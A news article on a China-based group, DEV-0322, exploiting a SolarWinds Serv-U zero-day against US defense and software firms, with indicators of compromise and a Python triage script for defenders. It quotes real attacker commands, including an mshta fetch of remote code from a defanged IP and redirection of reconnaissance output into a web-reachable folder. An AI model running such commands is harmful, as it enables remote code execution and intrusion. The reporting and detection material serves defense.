China-based hackers are actively targeting US defense and software companies by exploiting a vulnerability in the SolarWinds Serv-U FTP server.
Today, SolarWinds released a security update for a zero-day vulnerability in Serv-U FTP servers that allows remote code execution when SSH is enabled.
According to SolarWinds, the vulnerability was reported to it by Microsoft, which had observed a threat actor actively exploiting the flaw to execute commands on vulnerable customers' devices.
Tonight, Microsoft disclosed that it attributes the attacks with high confidence to a China-based threat group tracked as 'DEV-0322.'
“This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure,” says a new blog post by the Microsoft Threat Intelligence Center.
This threat group targets publicly exposed Serv-U FTP servers belonging to entities in the US Defense Industrial Base Sector and software companies.
“The DIB Sector is the worldwide industrial complex that enables research and development (R&D), as well as design, production, delivery, and maintenance of military weapons systems, subsystems, and components or parts, to meet U.S. military requirements,” explains a CISA document describing the DIB sector.
Attacks detected by Microsoft 365 Defender telemetry
Microsoft says it first learned of the attacks when Microsoft 365 Defender telemetry showed the normally benign Serv-U process spawning anomalous, malicious child processes.
Some of the commands executed through the remote code execution vulnerability are listed below.
C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
cmd.exe /c whoami > "./Client/Common/redacted.txt"
cmd.exe /c dir > ".\Client\Common\redacted.txt"
cmd.exe /c ""C:\Windows\Temp\Serv-U.bat""
powershell.exe C:\Windows\Temp\Serv-U.bat
cmd.exe /c type \\redacted\redacted.Archive > "C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive"
“We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U Client\Common folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands,” Microsoft explains in its blog post.
Other commands added a global admin user to the Serv-U FTP server configuration or launched batch files and scripts, most likely to install malware on the devices for persistence and remote access.
Microsoft says Serv-U users can check whether their devices were compromised by examining the Serv-U DebugSocketLog.txt log file for exception messages.
A “C0000005; CSUSSHSocket::ProcessReceive” exception may indicate that the threat actors attempted to exploit the Serv-U server, but the same exception can be logged for other reasons, so on its own it is a lead rather than proof of compromise.
An example exception seen in logs is displayed below.
EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5
Other signs that a device may have been compromised are:
- Recently created .txt files under the Client\Common folder.
- Serv-U spawning mshta.exe, powershell.exe, or cmd.exe, or processes running from C:\Windows\Temp.
- Unrecognized global users in the Serv-U configuration.
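The checks above, plus the Client\Common output-redirection behaviour described earlier, can be scripted for triage. The following is an added example written for this article; it is not code from Microsoft, SolarWinds, or the Serv-U product. It runs each indicator over constructed sample data (the DebugSocketLog.txt lines, the process-telemetry records, the file listing, the user lists and the install path under C:\Program Files\RhinoSoft\Serv-U are all assumptions made for illustration) so that it can be exercised offline before being pointed at real collections.

```python
"""Triage helper for the Serv-U compromise indicators listed in the article.

Added example, not vendor code. Every sample record below is constructed;
real log formats, telemetry shapes and install paths are assumptions.
"""
import re
from datetime import datetime, timedelta

# The ProcessReceive exception Microsoft calls out. It is a lead, not proof:
# the same exception can be logged for benign reasons.
EXPLOIT_EXCEPTION = re.compile(r"EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive")

# Children the Serv-U service has no legitimate reason to spawn.
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe", "cmd.exe"}
SUSPICIOUS_DIR = "c:\\windows\\temp\\"


def scan_debug_log(lines):
    """Return the DebugSocketLog.txt lines that carry the ProcessReceive exception."""
    return [ln for ln in lines if EXPLOIT_EXCEPTION.search(ln)]


def scan_process_events(events):
    """events: dicts with parent, image, cmdline (assumed telemetry shape).

    Flags any child of Serv-U.exe that is mshta/powershell/cmd, runs from
    C:\\Windows\\Temp, or redirects output into the web-reachable Client\\Common
    folder, the retrieval trick DEV-0322 used. Returns (image, reasons) pairs.
    """
    hits = []
    for ev in events:
        if ev["parent"].lower() != "serv-u.exe":
            continue
        image = ev["image"].lower()
        name = image.rsplit("\\", 1)[-1]
        reasons = []
        if name in SUSPICIOUS_CHILDREN:
            reasons.append("serv-u spawned " + name)
        if image.startswith(SUSPICIOUS_DIR):
            reasons.append("child runs from C:\\Windows\\Temp")
        if "client\\common" in ev["cmdline"].lower():
            reasons.append("command output redirected into Client\\Common")
        if reasons:
            hits.append((ev["image"], reasons))
    return hits


def scan_client_common(files, now, max_age=timedelta(days=30)):
    """files: (path, mtime) pairs. Flag recently written .txt files in Client\\Common."""
    return [p for p, mtime in files
            if "\\client\\common\\" in p.lower() and p.lower().endswith(".txt")
            and now - mtime <= max_age]


def scan_global_users(configured, known):
    """Global users present in the Serv-U config but absent from the admin's baseline."""
    return sorted(set(configured) - set(known))


# ---- constructed sample data (not real collections) ----
NOW = datetime(2021, 7, 13, 12, 0)
SAMPLE_DEBUG_LOG = [
    "Listening on 0.0.0.0:22 (SSH)",
    "EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; "
    "nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5",
    "Session closed",
]
SAMPLE_EVENTS = [
    {"parent": "services.exe", "image": r"C:\Program Files\RhinoSoft\Serv-U\Serv-U.exe", "cmdline": "Serv-U.exe"},
    {"parent": "Serv-U.exe", "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe http://144[.]34[.]179[.]162/a"},
    {"parent": "Serv-U.exe", "image": r"C:\Windows\System32\cmd.exe", "cmdline": r'cmd.exe /c whoami > ".\Client\Common\out.txt"'},
    {"parent": "Serv-U.exe", "image": r"C:\Windows\Temp\update.exe", "cmdline": "update.exe"},  # hypothetical dropped binary
    {"parent": "explorer.exe", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},  # admin's own shell, ignored
]
SAMPLE_FILES = [
    (r"C:\Program Files\RhinoSoft\Serv-U\Client\Common\out.txt", NOW - timedelta(hours=2)),
    (r"C:\Program Files\RhinoSoft\Serv-U\Client\Common\readme.txt", NOW - timedelta(days=400)),
    (r"C:\Program Files\RhinoSoft\Serv-U\Client\Common\logo.png", NOW - timedelta(hours=1)),
]
CONFIGURED_GLOBAL_USERS = ["backup", "deploy", "svc_ftp_admin"]
KNOWN_GLOBAL_USERS = ["backup", "deploy"]


def triage():
    """Run every check and return the findings keyed by indicator."""
    return {
        "debug_log": scan_debug_log(SAMPLE_DEBUG_LOG),
        "processes": scan_process_events(SAMPLE_EVENTS),
        "client_common": scan_client_common(SAMPLE_FILES, NOW),
        "global_users": scan_global_users(CONFIGURED_GLOBAL_USERS, KNOWN_GLOBAL_USERS),
    }


if __name__ == "__main__":
    for indicator, findings in triage().items():
        print(indicator, "->", findings or "none")
```

Each indicator is deliberately kept as a separate function so that a single hit (for example the exception alone) can be weighed on its own, as Microsoft's caveat requires; a Serv-U process spawning cmd.exe with output redirected into Client\Common is far stronger evidence than the exception by itself.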
BleepingComputer has reached out to Microsoft to learn more about what commands or malware were executed by the batch file and scripts but has not heard back.